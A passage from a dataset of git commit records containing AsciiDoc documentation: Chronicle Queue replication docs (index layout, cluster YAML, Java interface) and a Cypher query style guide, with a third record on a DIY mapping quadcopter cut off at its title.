index.\n\n<3> specifies the point to the next level index.\n\nNOTE: In this way, indexes can be tiered (primary, secondary, tertiary, etc.) as required to enhance indexing speed and efficiency.\n\n=== Final level index\n\n----\n# position: 262568, header: -1 # <1>\n--- !!meta-data #binary\nindex: [ # <2>\n # length: 32768, used: 1\n 524744, # <3>\n 0, 0, 0, 0, 0, 0, 0, 0,\n]\n----\n<1> `position` specifies the point in the queue.\n\n<2> `index` defines a pointer to the data.\n\n<3> specifies the point in the queue where the data begins.\n\n=== Data location\n\n----\n# position: 524744, header: 0 # <1>\n--- !!data #binary # <2>\n\"\": some more text\n...\n# 785952 bytes remaining\n\n----\n<1> `position` specifies the point in the queue where the data begins.\n\n<2> `data` defines the information that follows is data (`--- !!data #binary #`), rather than than meta data (`--- !!meta-data #binary`).\n\n\n== Configuration File\n\nThe host in a cluster are defined in a YAML configuration file. This configuration file below, has just two hosts, but there is no fixed limit to the number of hosts you could include, ultimately it is limited by your hardware resources.\n\nEach host is a running an instance of Chronicle. When using Chronicle Queue Enterprise Edition, these engines are likely to each contain a Chronicle queue. In this example below there are two hosts, one running on `localhost:8080`, and the other on `localhost:8081`. The hosts are on the same machine; in a real life example, these hosts would usually be on different machines.\n\nNOTE: The examples given below perform queue replication using established interfaces that are based on the open source Chronicle Engine API.\n\n[source, yaml]\n----\n\ncluster: {\n context: !EngineClusterContext {\n }\n host1: {\n hostId: 1,\n tcpBufferSize: 65536,\n connectUri: localhost:8080,\n timeoutMs: 5000,\n },\n host2: {\n hostId: 2,\n tcpBufferSize: 65536,\n connectUri: localhost:8081,\n timeoutMs: 5000,\n }\n}\n----\n\n== Host ID\n\nWhen adding a host, you must provide a unique ID for each host; we refer to this ID as the `hostId`. The `hostId` must be a integer, from `1` to `MAX_INTEGER`.\n\n[source, yaml]\n----\n host: {\n hostId: <unique id>,\n }\n----\n\nIt is important that this `hostId` is unique as it is used by Chronicle Engine clustering. For Queue replication, by default, the host with `hostID` of `1` is assumed to be the PRIMARY, and the other hostids are assumed to be the SECONDARYs.\n\n== Creating an instance of the `ChronicleQueueView`\n\nThe following code is an example of how to create an instance of a host.\n\n[source, java]\n----\nfinal AssetTree tree = new VanillaAssetTree((byte) hostId)\n .forTesting()\n .withConfig(resourcesDir() + \"\/config\", OS.TARGET + \"\/\" + hostId);\n\nfinal Asset queue = tree.root().acquireAsset(\"the\/uri\");\n\nqueue.addLeafRule(QueueView.class, LAST + \"chronicle queue\", (context, asset) -> {\n try {\n return new ChronicleQueueView(context.wireType(writeType).cluster(clusterName)\n .elementType(context.elementType()).messageType(context.messageType()), asset);\n } catch (IOException e) {\n throw Jvm.rethrow(e);\n }\n});\n\n\/\/ change the host\/port to either localhost:8080 or localhost:8081 depending on which host you are running\nServerEndpoint serverEndpoint = new ServerEndpoint(\"localhost:8080\", tree);\n----\n\nThe code above:\n\n- sets up Chronicle on port `localhost:8080`.\n- uses the configuration file shown. This configuration file should be stored at `config\/etc\/clusters.yaml`.\n- configures an asset on the Chronicle Engine asset tree at `\/the\/uri` with a `leafRule`. This `leafRule` is setup to provide a `ChronicleQueueView` when asked for a `ChronicleQueue`. The `ChronicleQueueView` is an implementation of the `ChronicleQueue` interface.\n\nAssuming that both `host1` and `host2` instances of Chronicle Engine were run with the same java code above, then messages added to the chronicle queue on `host1` would be replicated to `host2`.\n\nThe interface of the `ChronicleQueueView`, is as follows:\n\n[source, java]\n----\npublic interface QueueView<T, M> extends TopicPublisher<T, M>, KeyedView {\n\n \/**\n * returns a {@link Excerpt} at a given index\n *\n * @param index the location of the except\n *\/\n @Nullable\n Excerpt<T, M> get(long index);\n\n \/**\n * the next message from the current tailer which has this {@code topic}\n *\n * @param topic next excerpt that has this topic\n * @return the except\n *\/\n Excerpt<T, M> get(T topic);\n\n \/**\n * Publish to a provided topic.\n *\n * @param topic to publish to\n * @param message to publish.\n * @return the index in the chronicle queue the excerpt\n *\/\n long publishAndIndex(@NotNull T topic, @NotNull M message);\n\n interface Excerpt<T, M> {\n T topic();\n\n M message();\n\n long index();\n\n void clear();\n }\n\n interface Tailer<T, M> {\n \/**\n * @return the next message from the current tailer\n *\/\n @Nullable\n Excerpt<T, M> read();\n }\n}\n----\n\n\n== Definitions\n\n|=======\n|`Excerpt`| In Chronicle we refer to messages as excerpts.\n|`PRIMARY` | The master of the messages; messages are replicated from the PRIMARY to the SECONDARY.\n|`SECONDARY` | The receiver of the messages; holds an real-time up-to-date copy of the PRIMARY's data.\n|=======\n\n'''\n\n<<..\/README.adoc#,Back to Chronicle Queue>>\n","old_contents":"= Replication (Enterprise Edition Feature)\nNeil Clifford\n:toc: macro\n:toclevels: 1\n:css-signature: demo\n:toc-placement: macro\n:icons: font\n\ntoc::[]\n\nChronicle Queue replicates Chronicle Queue messages over TCP\/IP, from the `PRIMARY` to the `SECONDARY` to provide real-time back-up of your Chronicle queues.\n\nChronicle Queue automatically performs replication if the `chronicle-queue-enterprise.jar` is available in your class path, and you have set up a cluster in the `cluster.yaml` configuration file.\n\nNOTE: For more information on obtaining the `chronicle-queue-enterprise.jar` please contact mailto:sales@chronicle.software[sales@chronicle.software].\n\nChronicle Queue replication works by replicating all messages from the `PRIMARY` queue to the `SECONDARY` queue.\n\nimage::Chronicle-Queue-Replication_diagram_02.jpg[Replication]\n\nIMPORTANT: Chronicle requires exclusive write access to the `SECONDARY`. You should treat the `SECONDARY` as read-only, and not attempt to manually write messages.\n\n== Queue header\nThe Chronical Queue header is structured as follows:\n\n[source, java]\n----\n\n--- !!meta-data #binary\nheader: !SCQStore {\n wireType: !WireType BINARY_LIGHT,\n writePosition: 524744,\n roll: !SCQSRoll {\n length: !short 1000,\n format: yyyyMMdd-HHmmss,\n epoch: 0\n },\n indexing: !SCQSIndexing {\n indexCount: !int 32768,\n indexSpacing: 4,\n index2Index: 385,\n lastIndex: 4\n },\n lastAcknowledgedIndexReplicated: -1,\n recovery: !TimedStoreRecovery {\n timeStamp: 0\n },\n deltaCheckpointInterval: 0\n}\n----\n`lastAcknowledgedIndexReplicated` is set to `-1` when\n\n- replication is not being used, or\n\n- no replication acknowledgment has yet been received from the other host.\n\n`lastAcknowledgedIndexReplicated` will be automatically set to the index position of the latest acknowledged message.\n\n\n== Tiered Indexing\nChronicle Queue uses tiered multi-level indexing to provide a fast and efficient method for searching for messages in a large queue.\n\n=== Primary index\n----\n# position: 385, header: -1 # <1>\n--- !!meta-data #binary\nindex2index: [ # <2>\n # length: 32768, used: 1\n 262568, # <3>\n 0, 0, 0, 0, 0,\n]\n----\n\n<1> `position` specifies the starting address of the data that follows, within the the queue (*.cq4) file.\n\n<2> `index2Index` defines a pointer to the next lower level of index.\n\n<3> specifies the point to the next level index.\n\nNOTE: In this way, indexes can be tiered (primary, secondary, tertiary, etc.) as required to enhance indexing speed and efficiency.\n\n=== Final level index\n\n----\n# position: 262568, header: -1 # <1>\n--- !!meta-data #binary\nindex: [ # <2>\n # length: 32768, used: 1\n 524744, # <3>\n 0, 0, 0, 0, 0, 0, 0, 0,\n]\n----\n<1> `position` specifies the point in the queue.\n\n<2> `index` defines a pointer to the data.\n\n<3> specifies the point in the queue where the data begins.\n\n=== Data location\n\n----\n# position: 524744, header: 0 # <1>\n--- !!data #binary # <2>\n\"\": some more text\n...\n# 785952 bytes remaining\n\n----\n<1> `position` specifies the point in the queue where the data begins.\n\n<2> `data` defines the following information is data (`--- !!data #binary #`) rather than than meta data (`--- !!meta-data #binary`).\n\n\n== Configuration File\n\nThe host in a cluster are defined in a YAML configuration file. This configuration file below, has just two hosts, but there is no fixed limit to the number of hosts you could include, ultimately it is limited by your hardware resources.\n\nEach host is a running an instance of Chronicle. When using Chronicle Queue Enterprise Edition, these engines are likely to each contain a Chronicle queue. In this example below there are two hosts, one running on `localhost:8080`, and the other on `localhost:8081`. The hosts are on the same machine; in a real life example, these hosts would usually be on different machines.\n\nNOTE: The examples given below perform queue replication using established interfaces that are based on the open source Chronicle Engine API.\n\n[source, yaml]\n----\n\ncluster: {\n context: !EngineClusterContext {\n }\n host1: {\n hostId: 1,\n tcpBufferSize: 65536,\n connectUri: localhost:8080,\n timeoutMs: 5000,\n },\n host2: {\n hostId: 2,\n tcpBufferSize: 65536,\n connectUri: localhost:8081,\n timeoutMs: 5000,\n }\n}\n----\n\n== Host ID\n\nWhen adding a host, you must provide a unique ID for each host; we refer to this ID as the `hostId`. The `hostId` must be a integer, from `1` to `MAX_INTEGER`.\n\n[source, yaml]\n----\n host: {\n hostId: <unique id>,\n }\n----\n\nIt is important that this `hostId` is unique as it is used by Chronicle Engine clustering. For Queue replication, by default, the host with `hostID` of `1` is assumed to be the PRIMARY, and the other hostids are assumed to be the SECONDARYs.\n\n== Creating an instance of the `ChronicleQueueView`\n\nThe following code is an example of how to create an instance of a host.\n\n[source, java]\n----\nfinal AssetTree tree = new VanillaAssetTree((byte) hostId)\n .forTesting()\n .withConfig(resourcesDir() + \"\/config\", OS.TARGET + \"\/\" + hostId);\n\nfinal Asset queue = tree.root().acquireAsset(\"the\/uri\");\n\nqueue.addLeafRule(QueueView.class, LAST + \"chronicle queue\", (context, asset) -> {\n try {\n return new ChronicleQueueView(context.wireType(writeType).cluster(clusterName)\n .elementType(context.elementType()).messageType(context.messageType()), asset);\n } catch (IOException e) {\n throw Jvm.rethrow(e);\n }\n});\n\n\/\/ change the host\/port to either localhost:8080 or localhost:8081 depending on which host you are running\nServerEndpoint serverEndpoint = new ServerEndpoint(\"localhost:8080\", tree);\n----\n\nThe code above:\n\n- sets up Chronicle on port `localhost:8080`.\n- uses the configuration file shown. This configuration file should be stored at `config\/etc\/clusters.yaml`.\n- configures an asset on the Chronicle Engine asset tree at `\/the\/uri` with a `leafRule`. This `leafRule` is setup to provide a `ChronicleQueueView` when asked for a `ChronicleQueue`. The `ChronicleQueueView` is an implementation of the `ChronicleQueue` interface.\n\nAssuming that both `host1` and `host2` instances of Chronicle Engine were run with the same java code above, then messages added to the chronicle queue on `host1` would be replicated to `host2`.\n\nThe interface of the `ChronicleQueueView`, is as follows:\n\n[source, java]\n----\npublic interface QueueView<T, M> extends TopicPublisher<T, M>, KeyedView {\n\n \/**\n * returns a {@link Excerpt} at a given index\n *\n * @param index the location of the except\n *\/\n @Nullable\n Excerpt<T, M> get(long index);\n\n \/**\n * the next message from the current tailer which has this {@code topic}\n *\n * @param topic next excerpt that has this topic\n * @return the except\n *\/\n Excerpt<T, M> get(T topic);\n\n \/**\n * Publish to a provided topic.\n *\n * @param topic to publish to\n * @param message to publish.\n * @return the index in the chronicle queue the excerpt\n *\/\n long publishAndIndex(@NotNull T topic, @NotNull M message);\n\n interface Excerpt<T, M> {\n T topic();\n\n M message();\n\n long index();\n\n void clear();\n }\n\n interface Tailer<T, M> {\n \/**\n * @return the next message from the current tailer\n *\/\n @Nullable\n Excerpt<T, M> read();\n }\n}\n----\n\n\n== Definitions\n\n|=======\n|`Excerpt`| In Chronicle we refer to messages as excerpts.\n|`PRIMARY` | The master of the messages; messages are replicated from the PRIMARY to the SECONDARY.\n|`SECONDARY` | The receiver of the messages; holds an real-time up-to-date copy of the PRIMARY's data.\n|=======\n\n'''\n\n<<..\/README.adoc#,Back to Chronicle Queue>>\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9fff53b7113d3bc9ac40f47eb96b6d3c938e7a3","subject":"Update rule descriptions to improve language","message":"Update rule descriptions to improve language\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"docs\/style-guide.adoc","new_file":"docs\/style-guide.adoc","new_contents":"= The Cypher Style Guide\n\nStyle guide for writing Cypher code.\n\nNOTE: Cypher is a language.\nLanguages have their own rules, and are not eager to adapt to circumstance.\nRemember not to be too eager to shiv a Cypher expression into the conventions of a different language.\n\n== Why Is Style Important?\n\nConsider this dadaist work of art from Nigel Small and Nicole White:\n\n.Insane query\n[source, cypher]\n----\nMATCH (null)-[:merge]->(true)\nwith null.delete as foreach, `true`.false as null\nreturn 2 + foreach, coalesce(null, 3.1415)\nlimit 10;\n----\n\nThen compare it to this classical piece by Mark Needham:\n\n.Sane query\n[source, cypher]\n----\nMATCH (member:Member {name: 'Mark Needham'})\n -[:HAS_MEMBERSHIP]->()-[:OF_GROUP]->(:Group)-[:HAS_TOPIC]->(topic)\nWITH member, topic, count(*) AS score\nMATCH (topic)<-[:HAS_TOPIC]-(otherGroup:Group)\nWHERE NOT (member)-[:HAS_MEMBERSHIP]->(:Membership)-[:OF_GROUP]->(otherGroup)\nRETURN otherGroup.name, collect(topic.name), sum(score) AS score\nORDER BY score DESC\n----\n\n== Rules\n\nWhenever two rules are in conflict, use the order to decide which one trumps.\n\n\/\/ Template:\n\/\/. rule\n\/\/+\n\/\/.Bad\n\/\/[source, cypher]\n\/\/----\n\/\/MATCH (person:Person {property: value})\n\/\/----\n\/\/.. No padding space for parameters.\n\/\/+\n\/\/.Good\n\/\/[source, cypher]\n\/\/----\n\/\/WITH { param } AS value\n\/\/----\n\n. Start a new clause on a new line.\n+\n.Bad\n[source, cypher]\n----\nMATCH (n) WHERE n.name CONTAINS 's' RETURN n.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (n)\nWHERE n.name CONTAINS 's'\nRETURN n.name\n----\n\n.. Indent subclauses `ON CREATE` and `ON MATCH` with two spaces.\n+\n.Bad\n[source, cypher]\n----\nMERGE (n) ON CREATE SET n.prop = 0\nMERGE (a:A)-[:T]-(b:B)\nON CREATE SET a.name = 'me'\nON MATCH SET b.name = 'you'\n----\n+\n.Good\n[source, cypher]\n----\nMERGE (n)\n ON CREATE SET n.prop = 0\nMERGE (a:A)-[:T]-(b:B)\n ON CREATE SET a.name = 'me'\n ON MATCH SET b.name = 'you'\n----\n\n.. Put `ON CREATE` before `ON MATCH` if both are present.\n\/\/ no example necessary\n\n. Write keywords in upper case.\n+\n.Bad\n[source, cypher]\n----\nmatch (p:Person)\nwhere p.name starts with 'Ma'\nreturn p.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (p:Person)\nWHERE p.name STARTS WITH 'Ma'\nRETURN p.name\n----\n\n. Write labels in camel case, starting with an upper case character.\n+\n.Bad\n[source, cypher]\n----\nMATCH (e:editor-in-chief)-->(:employee)\nRETURN e.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (e:EditorInChief)-->(:Employee)\nRETURN e.name\n----\n\n. Prefer single nouns for labels.\n+\n.Bad\n[source, cypher]\n----\nMATCH (e:IsEmployed)\nRETURN e.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (e:Employee)\nRETURN e.name\n----\n\n. Write relationship types in upper case, using underscore to separate words.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-[own:owns-vehicle]->(:Car)\nRETURN own.since\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-[own:OWNS_VEHICLE]->(:Car)\nRETURN own.since\n----\n\n. Use camel case, starting with a lower case character, for:\n.. functions\n.. properties\n.. variables\n.. parameters\n+\n.Bad\n[source, cypher]\n----\nCREATE (N {Prop: 0})\nWITH RAND() AS Rand, {param} AS MAP\nRETURN Rand, MAP.property_key, Count(N)\n----\n+\n.Good\n[source, cypher]\n----\nCREATE (n {prop: 0})\nWITH rand() AS rand, {param} AS map\nRETURN rand, map.propertyKey, count(n)\n----\n\n. Use single quotes (Unicode character U+0027: ') for literal string values.\n+\n.Bad\n[source, cypher]\n----\nRETURN \"Cypher\"\n----\n+\n.Good\n[source, cypher]\n----\nRETURN 'Cypher'\n----\n\n. *Spacing*\n.. For literal maps:\n... No space between the opening brace and the first key\n... No space between key and colon\n... One space between colon and value\n... No space between value and comma\n... One space between comma and next key\n... No space between the last value and the closing brace\n+\n.Bad\n[source, cypher]\n----\nWITH { key1 :'value' ,key2 : 42 } AS map\nRETURN map\n----\n+\n.Good\n[source, cypher]\n----\nWITH {key1: 'value', key2: 42} AS map\nRETURN map\n----\n\n.. No padding space for parameters.\n+\n.Bad\n[source, cypher]\n----\nRETURN { param }\n----\n+\n.Good\n[source, cypher]\n----\nRETURN {param}\n----\n\n.. One space between label\/type predicates and property predicates in patterns.\n+\n.Bad\n[source, cypher]\n----\nMATCH (p:Person{property: -1})-[:KNOWS {since: 2016}]->()\nRETURN p.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (p:Person {property: -1})-[:KNOWS {since: 2016}]->()\nRETURN p.name\n----\n\n.. No space in patterns.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person) --> (:Vehicle)\nRETURN count(*)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(:Vehicle)\nRETURN count(*)\n----\n\n.. Use a wrapping space around operators.\n+\n.Bad\n[source, cypher]\n----\nMATCH p=(s)-->(e)\nWHERE s.name<>e.name\nRETURN length(p)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH p = (s)-->(e)\nWHERE s.name <> e.name\nRETURN length(p)\n----\n\n.. No space in label predicates.\n+\n.Bad\n[source, cypher]\n----\nMATCH (person : Person : Owner )\nRETURN person.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (person:Person:Owner)\nRETURN person.name\n----\n\n.. Use a space after each comma in lists and enumerations.\n+\n.Bad\n[source, cypher]\n----\nMATCH (),()\nWITH ['a','b',3.14] AS list\nRETURN list,2,3,4\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (), ()\nWITH ['a', 'b', 3.14] AS list\nRETURN list, 2, 3, 4\n----\n\n. When patterns wrap lines, break after arrows, not before.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)\n <--(:Country)\nRETURN count(vehicle)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)<--\n (:Country)\nRETURN count(vehicle)\n----\n\n. Surround node patterns with parentheses.\n.. This only concerns old Cypher code, as omitting parentheses is no longer legal in Cypher.\n+\n.Bad\n[source, cypher]\n----\nMATCH person-->vehicle\nRETURN person, vehicle\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (person)-->(vehicle)\nRETURN person, vehicle\n----\n\n. Avoid having to use back-ticks to escape characters and keywords.\n+\n.Bad\n[source, cypher]\n----\nMATCH (`odd-ch@racter$`:`Spaced Label` {`&property`: 42})\nRETURN labels(`odd-ch@racter$`)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (node:NonSpacedLabel {property: 42})\nRETURN labels(node)\n----\n\n. *Patterns*:\n.. Use anonymous nodes and relationships when the variable would not be used.\n+\n.Bad\n[source, cypher]\n----\nCREATE (a:End {prop: 42}),\n (b:End {prop: 3}),\n (c:Begin {prop: id(a)})\n----\n+\n.Good\n[source, cypher]\n----\nCREATE (a:End {prop: 42}),\n (:End {prop: 3}),\n (:Begin {prop: id(a)})\n----\n\n.. Chain patterns together to avoid repeating variables.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car), (vehicle:Car)-->(:Company)\nRETURN count(vehicle)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)\nRETURN count(vehicle)\n----\n\n.. Put named nodes before anonymous nodes.\n+\n.Bad\n[source, cypher]\n----\nMATCH ()-->(vehicle:Car)-->(manufacturer:Company)\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (manufacturer:Company)<--(vehicle:Car)<--()\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n\n.. Keep anchor nodes at the beginning of the `MATCH` clause.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(manufacturer:Company)\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (manufacturer:Company)<--(vehicle:Car)<--(:Person)\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n\n.. Prefer outgoing (left to right) pattern relationships to incoming pattern relationships.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Country)-->(:Company)<--(vehicle:Car)<--(:Person)\nRETURN vehicle.mileage\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)<--(:Country)\nRETURN vehicle.mileage\n----\n","old_contents":"= The Cypher Style Guide\n\nStyle guide for writing Cypher code.\n\nNOTE: Cypher is a language.\nLanguages have their own rules, and are not eager to adapt to circumstance.\nRemember not to be too eager to shiv a Cypher expression into the conventions of a different language.\n\n== Why Is Style Important?\n\nConsider this dadaist work of art from Nigel Small and Nicole White:\n\n.Insane query\n[source, cypher]\n----\nMATCH (null)-[:merge]->(true)\nwith null.delete as foreach, `true`.false as null\nreturn 2 + foreach, coalesce(null, 3.1415)\nlimit 10;\n----\n\nThen compare it to this classical piece by Mark Needham:\n\n.Sane query\n[source, cypher]\n----\nMATCH (member:Member {name: 'Mark Needham'})\n -[:HAS_MEMBERSHIP]->()-[:OF_GROUP]->(:Group)-[:HAS_TOPIC]->(topic)\nWITH member, topic, count(*) AS score\nMATCH (topic)<-[:HAS_TOPIC]-(otherGroup:Group)\nWHERE NOT (member)-[:HAS_MEMBERSHIP]->(:Membership)-[:OF_GROUP]->(otherGroup)\nRETURN otherGroup.name, collect(topic.name), sum(score) AS score\nORDER BY score DESC\n----\n\n== Rules\n\nWhenever two rules are in conflict, use the order to decide which one trumps.\n\n\/\/ Template:\n\/\/. rule\n\/\/+\n\/\/.Bad\n\/\/[source, cypher]\n\/\/----\n\/\/MATCH (person:Person {property: value})\n\/\/----\n\/\/.. No padding space for parameters.\n\/\/+\n\/\/.Good\n\/\/[source, cypher]\n\/\/----\n\/\/WITH { param } AS value\n\/\/----\n\n. Start a new clause on a new line.\n+\n.Bad\n[source, cypher]\n----\nMATCH (n) WHERE n.name CONTAINS 's' RETURN n.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (n)\nWHERE n.name CONTAINS 's'\nRETURN n.name\n----\n\n.. Indent subclauses `ON CREATE` and `ON MATCH` with two spaces.\n+\n.Bad\n[source, cypher]\n----\nMERGE (n) ON CREATE SET n.prop = 0\nMERGE (a:A)-[:T]-(b:B)\nON CREATE SET a.name = 'me'\nON MATCH SET b.name = 'you'\n----\n+\n.Good\n[source, cypher]\n----\nMERGE (n)\n ON CREATE SET n.prop = 0\nMERGE (a:A)-[:T]-(b:B)\n ON CREATE SET a.name = 'me'\n ON MATCH SET b.name = 'you'\n----\n\n.. Put `ON CREATE` before `ON MATCH` if both are present.\n\/\/ no example necessary\n\n. Write keywords in all caps.\n+\n.Bad\n[source, cypher]\n----\nmatch (p:Person)\nwhere p.name starts with 'Ma'\nreturn p.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (p:Person)\nWHERE p.name STARTS WITH 'Ma'\nRETURN p.name\n----\n\n. Write labels in camel case, starting with an upper case character.\n+\n.Bad\n[source, cypher]\n----\nMATCH (e:editor-in-chief)-->(:employee)\nRETURN e.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (e:EditorInChief)-->(:Employee)\nRETURN e.name\n----\n\n. Prefer single nouns for labels.\n+\n.Bad\n[source, cypher]\n----\nMATCH (e:IsEmployed)\nRETURN e.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (e:Employee)\nRETURN e.name\n----\n\n. Write relationship types in all caps, using underscore to separate words.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-[own:owns-vehicle]->(:Car)\nRETURN own.since\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-[own:OWNS_VEHICLE]->(:Car)\nRETURN own.since\n----\n\n. Use camel case, starting with a lower case character, for:\n.. functions\n.. properties\n.. variables\n.. parameters\n+\n.Bad\n[source, cypher]\n----\nCREATE (N {Prop: 0})\nWITH RAND() AS Rand, {param} AS MAP\nRETURN Rand, MAP.property_key, Count(N)\n----\n+\n.Good\n[source, cypher]\n----\nCREATE (n {prop: 0})\nWITH rand() AS rand, {param} AS map\nRETURN rand, map.propertyKey, count(n)\n----\n\n. Use single quotes (Unicode character U+0027: ') for literal string values.\n+\n.Bad\n[source, cypher]\n----\nRETURN \"Cypher\"\n----\n+\n.Good\n[source, cypher]\n----\nRETURN 'Cypher'\n----\n\n. *Spacing*\n.. For literal maps:\n... No space between opening brace and first key\n... No space between key and colon\n... One space between colon and value\n... No space between value and comma\n... One space between comma and next key\n... No space between last value and closing brace\n+\n.Bad\n[source, cypher]\n----\nWITH { key1 :'value' ,key2 : 42 } AS map\nRETURN map\n----\n+\n.Good\n[source, cypher]\n----\nWITH {key1: 'value', key2: 42} AS map\nRETURN map\n----\n\n.. No padding space for parameters.\n+\n.Bad\n[source, cypher]\n----\nRETURN { param }\n----\n+\n.Good\n[source, cypher]\n----\nRETURN {param}\n----\n\n.. One space between label\/type predicates and property predicates in patterns.\n+\n.Bad\n[source, cypher]\n----\nMATCH (p:Person{property: -1})-[:KNOWS {since: 2016}]->()\nRETURN p.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (p:Person {property: -1})-[:KNOWS {since: 2016}]->()\nRETURN p.name\n----\n\n.. No space in patterns.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person) --> (:Vehicle)\nRETURN count(*)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(:Vehicle)\nRETURN count(*)\n----\n\n.. Use wrapping space around operators.\n+\n.Bad\n[source, cypher]\n----\nMATCH p=(s)-->(e)\nWHERE s.name<>e.name\nRETURN length(p)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH p = (s)-->(e)\nWHERE s.name <> e.name\nRETURN length(p)\n----\n\n.. No space in label predicates.\n+\n.Bad\n[source, cypher]\n----\nMATCH (person : Person : Owner )\nRETURN person.name\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (person:Person:Owner)\nRETURN person.name\n----\n\n.. Use space after each comma in lists and enumerations.\n+\n.Bad\n[source, cypher]\n----\nMATCH (),()\nWITH ['a','b',3.14] AS list\nRETURN list,2,3,4\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (), ()\nWITH ['a', 'b', 3.14] AS list\nRETURN list, 2, 3, 4\n----\n\n. When patterns wrap lines, break after arrows, not before.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)\n <--(:Country)\nRETURN count(vehicle)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)<--\n (:Country)\nRETURN count(vehicle)\n----\n\n. Surround node patterns with parentheses.\n.. This only concerns old Cypher code, as it is no longer legal Cypher to omit parentheses.\n+\n.Bad\n[source, cypher]\n----\nMATCH person-->vehicle\nRETURN person, vehicle\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (person)-->(vehicle)\nRETURN person, vehicle\n----\n\n. Avoid having to use back-ticks to escape characters and keywords.\n+\n.Bad\n[source, cypher]\n----\nMATCH (`odd-ch@racter$`:`Spaced Label` {`&property`: 42})\nRETURN labels(`odd-ch@racter$`)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (node:NonSpacedLabel {property: 42})\nRETURN labels(node)\n----\n\n. *Patterns*:\n.. Leave nodes and relationships anonymous when the variable would not be used.\n+\n.Bad\n[source, cypher]\n----\nCREATE (a:End {prop: 42}),\n (b:End {prop: 3}),\n (c:Begin {prop: id(a)})\n----\n+\n.Good\n[source, cypher]\n----\nCREATE (a:End {prop: 42}),\n (:End {prop: 3}),\n (:Begin {prop: id(a)})\n----\n\n.. Chain patterns together to avoid repeating variables.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car), (vehicle:Car)-->(:Company)\nRETURN count(vehicle)\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)\nRETURN count(vehicle)\n----\n\n.. Put named nodes before anonymous nodes.\n+\n.Bad\n[source, cypher]\n----\nMATCH ()-->(vehicle:Car)-->(manufacturer:Company)\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (manufacturer:Company)<--(vehicle:Car)<--()\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n\n.. Keep anchor nodes at the beginning of the `MATCH` clause.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(manufacturer:Company)\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (manufacturer:Company)<--(vehicle:Car)<--(:Person)\nWHERE manufacturer.founded_year < 2000\nRETURN vehicle.mileage\n----\n\n.. Prefer outgoing (left to right) pattern relationships to incoming.\n+\n.Bad\n[source, cypher]\n----\nMATCH (:Country)-->(:Company)<--(vehicle:Car)<--(:Person)\nRETURN vehicle.mileage\n----\n+\n.Good\n[source, cypher]\n----\nMATCH (:Person)-->(vehicle:Car)-->(:Company)<--(:Country)\nRETURN vehicle.mileage\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9dd8c4d19547d8ec61be4aff43b97d12b0bd6570","subject":"Update 2015-07-18-Low-Cost-Quadcopter-Build-for-DIY-Mapping.adoc","message":"Update 2015-07-18-Low-Cost-Quadcopter-Build-for-DIY-Mapping.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-07-18-Low-Cost-Quadcopter-Build-for-DIY-Mapping.adoc","new_file":"_posts\/2015-07-18-Low-Cost-Quadcopter-Build-for-DIY-Mapping.adoc","new_contents":"= Low Cost Quadcopter Build for DIY 